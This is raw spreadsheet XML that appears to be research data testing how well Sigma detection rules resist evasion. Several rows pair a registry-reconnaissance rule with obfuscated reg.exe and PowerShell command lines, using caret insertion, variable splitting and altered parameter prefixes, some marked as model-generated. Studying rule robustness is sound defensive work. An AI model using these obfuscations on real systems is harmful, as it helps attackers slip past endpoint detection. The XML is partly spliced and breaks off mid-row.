    <row r="4570" ht="15.75" customHeight="1" s="42"/>
    <row r="4571" ht="15.75" customHeight="1" s="42"/>
    <row r="4572" ht="15.75" customHeight="1" s="42"/>
    <row r="4573" ht="15.75" customHeight="1" s="42"/>
    <row r="4574" ht="15.75" customHeight="1" s="42"/>
    <row r="4575" ht="15.75" customHeight="1" s="42"/>
    <row r="4576" ht="15.75" customHeight="1" s="42"/>
    <row r="4577" ht="15.75" customHeight="1" s="42"/>
    <row r="4578" ht="15.75" customHeight="1" s="42"/>
    <row r="4579" ht="15.75" customHeight="1" s="42"/>
    <row r="4580" ht="15.75" customHeight="1" s="42"/>
    <row r="4581" ht="15.75" customHeight="1" s="42"/>
    <row r="4582" ht="15.75" customHeight="1" s="42"/>
    <row r="4583" ht="15.75" customHeight="1" s="42"/>
    <row r="4584" ht="15.75" customHeight="1" s="42"/>
    <row r="4585" ht="15.75" customHeight="1" s="42"/>
    <row r="4586" ht="15.75" customHeight="1" s="42"/>
    <row r="4587" ht="15.75" customHeight="1" s="42"/>
    <row r="4588" ht="15.75" customHeight="1" s="42"/>
    <row r="4589" ht="15.75" customHeight="1" s="42"/>
    <row r="4590" ht="15.75" customHeight="1" s="42"/>
    <row r="4591" ht="15.75" customHeight="1" s="42"/>
    <row r="4592" ht="15.75" customHeight="1" s="42"/>
    <row r="4593" ht="15.75" customHeight="1" s="42"/>
    <row r="4594" ht="15.75" customHeight="1" s="42"/>
    <row r="4595" ht="15.75" customHeight="1" s="42"/>
    <row r="4596" ht="15.75" customHeight="1" s="42"/>
    <row r="4597" ht="15.75" customHeight="1" s="42"/>
    <row r="4598" ht="15.75" customHeight="1" s="42"/>
    <row r="4599" ht="15.75" customHeight="1" s="42"/>
    <row r="4600" ht="15.75" customHeight="1" s="42"/>
    <row r="4601" ht="15.75" customHeight="1" s="42"/>
    <row r="4602" ht="15.75" customHeight="1" s="42"/>
    <row r="4603" ht="15.75" customHeight="1" s="42"/>
    <row r="4604" ht="15.75" customHeight="1" s="42"/>
    <row r="4605" ht="15.75" customHeight="1" s="42"/>
    <row r="4606" ht="15.75" customHeight="1" s="42"/>
    <row r="4607" ht="15.75" customHeight="1" s="42"/>
    <row r="4608" ht="15.75" customHeight="1" s="42"/>
    <row r="4609" ht="15.75" customHeight="1" s="42"/>
    <row r="4610" ht="15.75" customHeight="1" s="42"/>
    <row r="4611" ht="15.75" customHeight="1" s="42"/>
    <row r="4612" ht="15.75" customHeight="1" s="42"/>
    <row r="4613" ht="15.75" customHeight="1" s="42"/>
    <row r="4614" ht="15.75" customHeight="1" s="42"/>
    <row r="4615" ht="15.75" customHeight="1" s="42"/>
    <row r="4616" ht="15.75" customHeight="1" s="42"/>
    <row r="4617" ht="15.75" customHeight="1" s="42"/>
    <row r="4618" ht="15.75" customHeight="1" s="42"/>
    <row r="4619" ht="15.75" customHeight="1" s="42"/>
    <row r="4620" ht="15.75" customHeight="1" s="42"/>
    <row r="4621" ht="15.75" customHeight="1" s="42"/>
    <row r="4622" ht="15.75" customHeight="1" s="42"/>
    <row r="4623" ht="15.75" customHeight="1" s="42"/>
    <row r="4624" ht="15.75" customHeight="1" s="42"/>
    <row r="4625" ht="15.75" customHeight="1" s="42"/>
    <row r="4626" ht="15.75" customHeight="1" s="42"/>
    <row r="4627" ht="15.75" customHeight="1" s="42"/>
    <row r="4628" ht="15.75" customHeight="1" s="42"/>
    <row r="4629" ht="15.75" customHeight="1" s="42"/>
    <row r="4630" ht="15.75" customHeight="1" s="42"/>
    <row r="4631" ht="15.75" customHeight="1" s="42"/>
    <row r="4632" ht="15.75" customHeight="1" s="42"/>
    <row r="4633" ht="15.75" customHeight="1" s="42"/>
    <row r="4634" ht="15.75" customHeight="1" s="42"/>
    <row r="4635" ht="15.75" customHeight="1" s="42"/>
    <row r="4636" ht="15.75" customHeight="1" s="42"/>
    <row r="4637" ht="15.75" customHeight="1" s="42"/>
    <row r="4638" ht="15.75" customHeight="1" s="42"/>
    <row r="4639" ht="15.75" customHeight="1" s="42"/>
    <row r="4640" ht="15.75" customHeight="1" s="42"/>
    <row r="4641" ht="15.75" customHeight="1" s="42"/>
    <row r="4642" ht="15.75" customHeight="1" s="42"/>
    <row r="4643" ht="15.75" customHeight="1" s="42"/>
    <row r="4644" ht="15.75" customHeight="1" s="42"/>
    <row r="4645" ht="15.75" customHeight="1" s="42"/>
    <row r="4646" ht="15.75" customHeight="1" s="42"/>
    <row r="4647" ht="15.75" customHeight="1" s="42"/>
    <row r="4648" ht="15.75" customHeight="1" s="42"/>
    <row r="4649" ht="15.75" customHeight="1" s="42"/>
    <row r="4650" ht="15.75" customHeight="1" s="42"/>
    <row r="4651" ht="15.75" customHeight="1" s="42"/>
    <row r="4652" ht="15.75" customHeight="1" s="42"/>
    <row r="4653" ht="15.75" customHeight="1" s="42"/>
    <row r="4654" ht="15.75" customHeight="1" s="42"/>
    <row r="4655" ht="15.75" customHeight="1" s="42"/>
    <row r="4656" ht="15.75" customHeight="1" s="42"/>
    <row r="4657" ht="15.75" customHeight="1" s="42"/>
    <row r="4658" ht="15.75" customHeight="1" s="42"/>
    <row r="4659" ht="15.75" customHeight="1" s="42"/>
    <row r="4660" ht="15.75" customHeight="1" s="42"/>
    <row r="4661" ht="15.75" customHeight="1" s="42"/>
    <row r="4662" ht="15.75" customHeight="1" s="42"/>
    <row r="4663" ht="15.75" customHeight="1" s="42"/>
    <row r="4664" ht="15.75" customHeight="1" s="42"/>
    <row r="4665" ht="15.75" customHeight="1" s="42"/>
    <row r="4666" ht="15.75" customHeight="1" s="42"/>
    <row r="4667" ht="15.75" customHeight="1" s="42"/>
    <row r="4668" ht="15.75" customHeight="1" s="42"/>
    <row r="4669" ht="15.75" customHeight="1" s="42"/>
    <row r="4670" ht="15.75" customHeight="1" s="42"/>
    <row r="4671" ht="15.75" customHeight="1" s="42"/>
    <row r="4672" ht="15.75" customHeight="1" s="42"/>
    <row r="4673" ht="15.75" customHeight="1" s="42"/>
    <row r="4674" ht="15.75" customHeight="1" s="42"/>
    <row r="4675" ht="15.75" customHeight="1" s="42"/>
    <row r="4676" ht="15.75" customHeight="1" s="42"/>
    <row r="4677" ht="15.75" customHeight="1" s="42"/>
    <row r="4678" ht="15.75" customHeight="1" s="42"/>
    <row r="4679" ht="15.75" customHeight="1" s="42"/>
    <row r="4680" ht="15.75" customHeight="1" s="42"/>
    <row r="4681" ht="15.75" customHeight="1" s="42"/>
    <row r="4682" ht="15.75" customHeight="1" s="42"/>
    <row r="4683" ht="15.75" customHeight="1" s="42"/>
    <row r="4684" ht="15.75" customHeight="1" s="42"/>
    <row r="4685" ht="15.75" customHeight="1" s="42"/>
    <row r="4686" ht="15.75" customHeight="1" s="42"/>
    <row r="4687" ht="15.75" customHeight="1" s="42"/>
    <row r="4688" ht="15.75" customHeight="1" s="42"/>
    <row r="4689" ht="15.75" customHeight="1" s="42"/>
    <row r="4690" ht="15.75" customHeight="1" s="42"/>
    <row r="4691" ht="15.75" customHeight="1" s="42"/>
    <row r="4692" ht="15.75" customHeight="1" s="42"/>
    <row r="4693" ht="15.75" customHeight="1" s="42"/>
    <row r="4694" ht="15.75" customHeight="1" s="42"/>
    <row r="4695" ht="15.75" customHeight="1" s="42"/>
    <row r="4696" ht="15.75" customHeight="1" s="42"/>
    <row r="4697" ht="15.75" customHeight="1" s="42"/>
    <row r="4698" ht="15.75" customHeight="1" s="42"/>
    <row r="4699" ht="15.75" customHeight="1" s="42"/>
    <row r="4700" ht="15.75" customHeight="1" s="42"/>
    <row r="4701" ht="15.75" customHeight="1" s="42"/>
    <row r="4702" ht="15.75" customHeight="1" s="42"/>
    <row r="4703" ht="15.75" customHeight="1" s="42"/>
    <row r="4704" ht="15.75" customHeight="1" s="42"/>
    <row r="4705" ht="15.75" customHeight="1" s="42"/>
    <row r="4706" ht="15.75" customHeight="1" s="42"/>
    <row r="4707" ht="15.75" customHeight="1" s="42"/>
    <row r="4708" ht="15.75" customHeight="1" s="42"/>
    <row r="4709" ht="15.75" customHeight="1" s="42"/>
    <row r="4710" ht="15.75" customHeight="1" s="42"/>
    <row r="4711" ht="15.75" customHeight="1" s="42"/>
    <row r="4712" ht="15.75" customHeight="1" s="42"/>
    <row r="4713" ht="15.75" customHeight="1" s="42"/>
    <row r="4714" ht="15.75" customHeight="1" s="42"/>
    <row r="4715" ht="15.75" customHeight="1" s="42"/>
    <row r="4716" ht="15.75" customHeight="1" s="42"/>
    <row r="4717" ht="15.75" customHeight="1" s="42"/>
    <row r="4718" ht="15.75" customHeight="1" s="42"/>
    <row r="4719" ht="15.75" customHeight="1" s="42"/>
    <row r="4720" ht="15.75" customHeight="1" s="42"/>
    <row r="4721" ht="15.75" customHeight="1" s="42"/>
    <row r="4722" ht="15.75" customHeight="1" s="42"/>
    <row r="4723" ht="15.75" customHeight="1" s="42"/>
    <row r="4724" ht="15.75" customHeight="1" s="42"/>
    <row r="4725" ht="15.75" customHeight="1" s="42"/>
    <row r="4726" ht="15.75" customHeight="1" s="42"/>
    <row r="4727" ht="15.75" customHeight="1" s="42"/>
    <row r="4728" ht="15.75" customHeight="1" s="42"/>
    <row r="4729" ht="15.75" customHeight="1" s="42"/>
    <row r="4730" ht="15.75" customHeight="1" s="42"/>
    <row r="4731" ht="15.75" customHeight="1" s="42"/>
    <row r="4732" ht="15.75" customHeight="1" s="42"/>
    <row r="4733" ht="15.75" customHeight="1" s="42"/>
    <row r="4734" ht="15.75" customHeight="1" s="42"/>
    <row r="4735" ht="15.75" customHeight="1" s="42"/>
    <row r="4736" ht="15.75" customHeight="1" s="42"/>
    <row r="4737" ht="15.75" customHeight="1" s="42"/>
    <row r="4738" ht="15.75" customHeight="1" s="42"/>
    <row r="4739" ht="15.75" customHeight="1" s="42"/>
    <row r="4740" ht="15.75" customHeight="1" s="42"/>
    <row r="4741" ht="15.75" customHeight="1" s="42"/>
    <row r="4742" ht="15.75" customHeight="1" s="42"/>
    <row r="4743" ht="15.75" customHeight="1" s="42"/>
    <row r="4744" ht="15.75" customHeight="1" s="42"/>
    <row r="4745" ht="15.75" customHeight="1" s="42"/>
    <row r="4746" ht="15.75" customHeight="1" s="42"/>
    <row r="4747" ht="15.75" customHeight="1" s="42"/>
    <row r="4748" ht="15.75" customHeight="1" s="42"/>
    <row r="4749" ht="15.75" customHeight="1" s="42"/>
    <row r="4750" ht="15.75" customHeight="1" s="42"/>
    <row r="4751" ht="15.75" customHeight="1" s="42"/>
    <row r="4752" ht="15.75" customHeight="1" s="42"/>
    <row r="4753" ht="15.75" customHeight="1" s="42"/>
    <row r="4754" ht="15.75" customHeight="1" s="42"/>
    <row r="4755" ht="15.75" customHeight="1" s="42"/>
    <row r="4756" ht="15.75" customHeight="1" s="42"/>
    <row r="4757" ht="15.75" customHeight="1" s="42"/>
    <row r="4758" ht="15.75" customHeight="1" s="42"/>
    <row r="4759" ht="15.75" customHeight="1" s="42"/>
    <row r="4760" ht="15.75" customHeight="1" s="42"/>
    <row r="4761" ht="15.75" customHeight="1" s="42"/>
    <row r="4762" ht="15.75" customHeight="1" s="42"/>
    <row r="4763" ht="15.75" customHeight="1" s="42"/>
    <row r="4764" ht="15.75" customHeight="1" s="42"/>
    <row r="4765" ht="15.75" customHeight="1" s="42"/>
    <row r="4766" ht="15.75" customHeight="1" s="42"/>
    <row r="4767" ht="15.75" customHeight="1" s="42"/>
    <row r="4768" ht="15.75" customHeight="1" s="42"/>
    <row r="4769" ht="15.75" customHeight="1" s="42"/>
    <row r="4770" ht="15.75" customHeight="1" s="42"/>
    <row r="4771" ht="15.75" customHeight="1" s="42"/>
    <row r="4772" ht="15.75" customHeight="1" s="42"/>
    <row r="4773" ht="15.75" customHeight="1" s="42"/>
    <row r="4774" ht="15.75" customHeight="1" s="42"/>
    <row r="4775" ht="15.75" customHeight="1" s="42"/>
    <row r="4776" ht="15.75" customHeight="1" s="42"/>
    <row r="4777" ht="15.75" customHeight="1" s="42"/>
    <row r="4778" ht="15.75" customHeight="1" s="42"/>
    <row r="4779" ht="15.75" customHeight="1" s="42"/>
    <row r="4780" ht="15.75" customHeight="1" s="42"/>
    <row r="4781" ht="15.75" customHeight="1" s="42"/>
    <row r="4782" ht="15.75" customHeight="1" s="42"/>
    <row r="4783" ht="15.75" customHeight="1" s="42"/>
    <row r="4784" ht="15.75" customHeight="1" s="42"/>
    <row r="4785" ht="15.75" customHeight="1" s="42"/>
    <row r="4786" ht="15.75" customHeight="1" s="42"/>
    <row r="4787" ht="15.75" customHeight="1" s="42"/>
    <row r="4788" ht="15.75" customHeight="1" s="42"/>
    <row r="4789" ht="15.75" customHeight="1" s="42"/>
    <row r="4790" ht="15.75" customHeight="1" s="42"/>
    <row r="4791" ht="15.75" customHeight="1" s="42"/>
    <row r="4792" ht="15.75" customHeight="1" s="42"/>
    <row r="4793" ht="15.75" customHeight="1" s="42"/>
    <row r="4794" ht="15.75" customHeight="1" s="42"/>
    <row r="4795" ht="15.75" customHeight="1" s="42"/>
    <row r="4796" ht="15.75" customHeight="1" s="42"/>
    <row r="4797" ht="15.75" customHeight="1" s="42"/>
    <row r="4798" ht="15.75" customHeight="1" s="42"/>
    <row r="4799" ht="15.75" customHeight="1" s="42"/>
    <row r="4800" ht="15.75" customHeight="1" s="42"/>
    <row r="4801" ht="15.75" customHeight="1" s="42"/>
    <row r="4802" ht="15.75" customHeight="1" s="42"/>
    <row r="4803" ht="15.75" customHeight="1" s="42"/>
    <row r="4804" ht="15.75" customHeight="1" s="42"/>
    <row r="4805" ht="15.75" customHeight="1" s="42"/>
    <row r="4806" ht="15.75" customHeight="1" s="42"/>
    <row r="4807" ht="15.75" customHeight="1" s="42"/>
    <row r="4808" ht="15.75" customHeight="1" s="42"/>
    <row r="4809" ht="15.75" customHeight="1" s="42"/>
    <row r="4810" ht="15.75" customHeight="1" s="42"/>
    <row r="4811" ht="15.75" customHeight="1" s="42"/>
    <row r="4812" ht="15.75" customHeight="1" s="42"/>
    <row r="4813" ht="15.75" customHeight="1" s="42"/>
    <row r="4814" ht="15.75" customHeight="1" s="42"/>
    <row r="4815" ht="15.75" customHeight="1" s="42"/>
    <row r="4816" ht="15.75" customHeight="1" s="42"/>
    <row r="4817" ht="15.75" customHeight="1" s="42"/>
    <row r="4818" ht="15.75" customHeight="1" s="42"/>
    <row r="4819" ht="15.75" customHeight="1" s="42"/>
    <row r="4820" ht="15.75" customHeight="1" s="42"/>
    <row r="4821" ht="15.75" customHeight="1" s="42"/>
    <row r="4822" ht="15.75" customHeight="1" s="42"/>
    <row r="4823" ht="15.75" customHeight="1" s="42"/>
    <row r="4824" ht="15.75" customHeight="1" s="42"/>
    <row r="4825" ht="15.75" customHeight="1" s="42"/>
    <row r="4826" ht="15.75" customHeight="1" s="42"/>
    <row r="4827" ht="15.75" customHeight="1" s="42"/>
    <row r="4828" ht="15.75" customHeight="1" s="42"/>
    <row r="4829" ht="15.75" customHeight="1" s="42"/>
    <row r="4830" ht="15.75" customHeight="1" s="42"/>
    <row r="4831" ht="15.75" customHeight="1" s="42"/>
    <row r="4832" ht="15.75" customHeight="1" s="42"/>
    <row r="4833" ht="15.75" customHeight="1" s="42"/>
    <row r="4834" ht="15.75" customHeight="1" s="42"/>
    <row r="4835" ht="15.75" customHeight="1" s="42"/>
    <row r="4836" ht="15.75" customHeight="1" s="42"/>
    <row r="4837" ht="15.75" customHeight="1" s="42"/>
    <row r="4838" ht="15.75" customHeight="1" s="42"/>
    <row r="4839" ht="15.75" customHeight="1" s="42"/>
    <row r="4840" ht="15.75" customHeight="1" s="42"/>
    <row r="4841" ht="15.75" customHeight="1" s="42"/>
    <row r="4842" ht="15.75" customHeight="1" s="42"/>
    <row r="4843" ht="15.75" customHeight="1" s="42"/>
    <row r="4844" ht="15.75" customHeight="1" s="42"/>
    <row r="4845" ht="15.75" customHeight="1" s="42"/>
    <row r="4846" ht="15.75" customHeight="1" s="42"/>
    <row r="4847" ht="15.75" customHeight="1" s="42"/>
    <row r="4848" ht="15.75" customHeight="1" s="42"/>
    <row r="4849" ht="15.75" customHeight="1" s="42"/>
    <row r="4850" ht="15.75" customHeight="1" s="42"/>
    <row r="4851" ht="15.75" customHeight="1" s="42"/>
    <row r="4852" ht="15.75" customHeight="1" s="42"/>
    <row r="4853" ht="15.75" customHeight="1" s="42"/>
    <row r="4854" ht="15.75" customHeight="1" s="42"/>
    <row r="4855" ht="15.75" customHeight="1" s="42"/>
    <row r="4856" ht="15.75" customHeight="1" s="42"/>
    <row r="4857" ht="15.75" customHeight="1" s="42"/>
    <row r="4858" ht="15.75" customHeight="1" s="42"/>
    <row r="4859" ht="15.75" customHeight="1" s="42"/>
    <row r="4860" ht="15.75" customHeight="1" s="42"/>
    <row r="4861" ht="15.75" customHeight="1" s="42"/>
    <row r="4862" ht="15.75" customHeight="1" s="42"/>
    <row r="4863" ht="15.75" customHeight="1" s="42"/>
    <row r="4864" ht="15.75" customHeight="1" s="42"/>
    <row r="4865" ht="15.75" customHeight="1" s="42"/>
    <row r="4866" ht="15.75" customHeight="1" s="42"/>
    <row r="4867" ht="15.75" customHeight="1" s="42"/>
    <row r="4868" ht="15.75" customHeight="1" s="42"/>
    <row r="4869" ht="15.75" customHeight="1" s="42"/>
    <row r="4870" ht="15.75" customHeight="1" s="42"/>
    <row r="4871" ht="15.75" customHeight="1" s="42"/>
    <row r="4872" ht="15.75" customHeight="1" s="42"/>
    <row r="4873" ht="15.75" customHeight="1" s="42"/>
    <row r="4874" ht="15.75" customHeight="1" s="42"/>
    <row r="4875" ht="15.75" customHeight="1" s="42"/>
    <row r="4876" ht="15.75" customHeight="1" s="42"/>
    <row r="4877" ht="15.75" customHeight="1" s="42"/>
    <row r="4878" ht="15.75" customHeight="1" s="42"/>
    <row r="4879" ht="15.75" customHeight="1" s="42"/>
    <row r="4880" ht="15.75" customHeight="1" s="42"/>
    <row r="4881" ht="15.75" customHeight="1" s="42"/>
    <row r="4882" ht="15.75" customHeight="1" s="42"/>
    <row r="4883" ht="15.75" customHeight="1" s="42"/>
    <row r="4884" ht="15.75" customHeight="1" s="42"/>
    <row r="4885" ht="15.75" customHeight="1" s="42"/>
    <row r="4886" ht="15.75" customHeight="1" s="42"/>
    <row r="4887" ht="15.75" customHeight="1" s="42"/>
    <row r="4888" ht="15.75" customHeight="1" s="42"/>
    <row r="4889" ht="15.75" customHeight="1" s="42"/>
    <row r="4890" ht="15.75" customHeight="1" s="42"/>
    <row r="4891" ht="15.75" customHeight="1" s="42"/>
    <row r="4892" ht="15.75" customHeight="1" s="42"/>
    <row r="4893" ht="15.75" customHeight="1" s="42"/>
  </sheetData>
  <autoFilter ref="A1:K4193"/>
  <hyperlinks>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="E18" r:id="rId1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34" customWidth="1" style="42" min="2" max="2"/>
    <col width="36" customWidth="1" style="42" min="3" max="3"/>
    <col width="38" customWidth="1" style="42" min="4" max="4"/>
    <col width="60" customWidth="1" style="42" min="5" max="5"/>
    <col width="18" customWidth="1" style="42" min="6" max="10"/>
    <col width="13" customWidth="1" style="42" min="11" max="11"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="35" t="inlineStr">
        <is>
          <t>Technical</t>
        </is>
      </c>
      <c r="B1" s="35" t="inlineStr">
        <is>
          <t>Rule_name</t>
        </is>
      </c>
      <c r="C1" s="35" t="inlineStr">
        <is>
          <t>Title</t>
        </is>
      </c>
      <c r="D1" s="35" t="inlineStr">
        <is>
          <t>Rule_id</t>
        </is>
      </c>
      <c r="E1" s="35" t="inlineStr">
        <is>
          <t>Commandline_evasion</t>
        </is>
      </c>
      <c r="F1" s="35" t="inlineStr">
        <is>
          <t>Excutable</t>
        </is>
      </c>
      <c r="G1" s="35" t="inlineStr">
        <is>
          <t>Bypass target rule</t>
        </is>
      </c>
      <c r="H1" s="35" t="inlineStr">
        <is>
          <t>Bypass all rule</t>
        </is>
      </c>
      <c r="I1" s="35" t="inlineStr">
        <is>
          <t>Trigger rule</t>
        </is>
      </c>
      <c r="J1" s="35" t="inlineStr">
        <is>
          <t>LLM</t>
        </is>
      </c>
      <c r="K1" s="35" t="inlineStr">
        <is>
          <t>behavior</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="36" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B2" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C2" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E2" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "reg.exe q^u^e^r^y HKLM\System\CurrentControlSet\Services"</t>
        </is>
      </c>
      <c r="F2" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G2" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H2" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I2" s="43" t="n"/>
      <c r="J2" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K2" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="36" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B3" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C3" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D3" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E3" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "set KEY=currentcontrolset\services &amp;&amp; call reg.exe query HKLM\System\%KEY%"</t>
        </is>
      </c>
      <c r="F3" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G3" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H3" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I3" s="43" t="n"/>
      <c r="J3" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K3" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="36" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B4" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C4" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D4" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E4" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'"</t>
        </is>
      </c>
      <c r="F4" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G4" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H4" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I4" s="43" t="n"/>
      <c r="J4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K4" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="36" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B5" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C5" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D5" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E5" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'"</t>
        </is>
      </c>
      <c r="F5" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G5" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H5" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I5" s="43" t="n"/>
      <c r="J5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K5" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="36" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B6" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C6" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D6" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E6" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'"</t>
        </is>
      </c>
      <c r="F6" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G6" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H6" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I6" s="43" t="n"/>
      <c r="J6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K6" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="36" t="inlineStr">
        <is>
          <t>t1007</t>
        </is>
      </c>
      <c r="B7" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C7" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D7" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E7" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'"</t>
        </is>
      </c>
      <c r="F7" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G7" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H7" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I7" s="43" t="n"/>
      <c r="J7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K7" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B8" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C8" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D8" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E8" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "reg.exe q^u^e^r^y HKLM\System\CurrentControlSet\Services"</t>
        </is>
      </c>
      <c r="F8" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G8" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H8" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I8" s="43" t="n"/>
      <c r="J8" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K8" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B9" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C9" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D9" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E9" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "set KEY=currentcontrolset\services &amp;&amp; call reg.exe query HKLM\System\%KEY%"</t>
        </is>
      </c>
      <c r="F9" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G9" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H9" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I9" s="43" t="n"/>
      <c r="J9" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K9" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B10" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C10" s="36" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D10" s="36" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E10" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'"</t>
        </is>
      </c>
      <c r="F10" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G10" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H10" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I10" s="43" t="n"/>
      <c r="J10" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K10" s="36" t="b">
